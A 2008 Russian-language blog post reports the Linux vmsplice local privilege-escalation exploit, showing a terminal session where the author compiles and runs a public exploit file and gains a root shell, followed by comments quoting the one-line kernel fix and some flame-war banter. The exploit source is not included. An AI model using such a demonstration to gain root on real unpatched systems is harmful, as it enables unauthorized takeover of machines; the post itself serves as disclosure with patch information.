Home > Linux, openSuse, security, взлом > Локальный Root на Linux

Локальный Root на Linux

Сегодня ночью (или вчера) в сети появился код эксплоита для получения локального рута. Насколько я знаю, то уязвимости подвержены ядра c 2.6.17. На сегодняшний день выпущено ядро 2.6.24.2, в котором уязвимость уже профиксена. Получить рута от простого пользователя не сложно, имея код эксплоита, что и было проверено мной на машине:

wert2all@wert2all:~/tmp/exploid> uname -a
Linux wert2all 2.6.22.16-0.2-default #1 SMP 2008/02/01 19:36:55 UTC x86_64 x86_64 x86_64 GNU/Linux
wert2all@wert2all:~/tmp/exploid> gcc local_root.c -o local-root
wert2all@wert2all:~/tmp/exploid> ./local-root
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2b260abaf000 .. 0x2b260abe1000
[+] root
wert2all:~/tmp/exploid # whoami
root
wert2all:~/tmp/exploid #

Это печально, даже если учесть, что у некоторых он не срабатывает с первого раза. Пока апдейта для OpenSuSE нет, но после такого должно выйти быстренько.

Categories: Linux, openSuse, security, взлом Tags:
  1. February 11th, 2008 at 20:08 | #1

    А что самое замечательное, то исправлено 1 строчку:

    code>
    - if (unlikely(!base))
      if (!access_ok(VERIFY_READ, base, len))
    break;
    
    
  2. Гордый пользователи продукции Майкрософт
    February 14th, 2008 at 18:09 | #2

    ааааа, то-то же!
    заэксплойтили вас, красноглазегов :-р

    С ув. Горный пользователь VPS на Debian $)

  3. February 15th, 2008 at 10:38 | #3

    чукча не читатель, чукса писатель ? (с) Лор

    Знаешь, что такое локальный? Не бумал, что исправлено в течении трёх часов? Ядро от Дябиана вышло почти сразу. Ядро моей Сюзи, уже пересобраное, красивое и без моего напильника, вишло на следующий день (может и ночью, не проверял).

    А гордым пользователям краденой продукции рассказать, через сколько обновления в ОС выходят?

    зы. на ядрах с патчами OpenVZ эксплоид не работал, так что поговорка с напильником для вирусов ещё актуальна.

  4. Гордый пользователи продукции Майкрософт
    February 15th, 2008 at 12:00 | #4

    не эксплоид, а эксплоит, дурашка

  1. No trackbacks yet.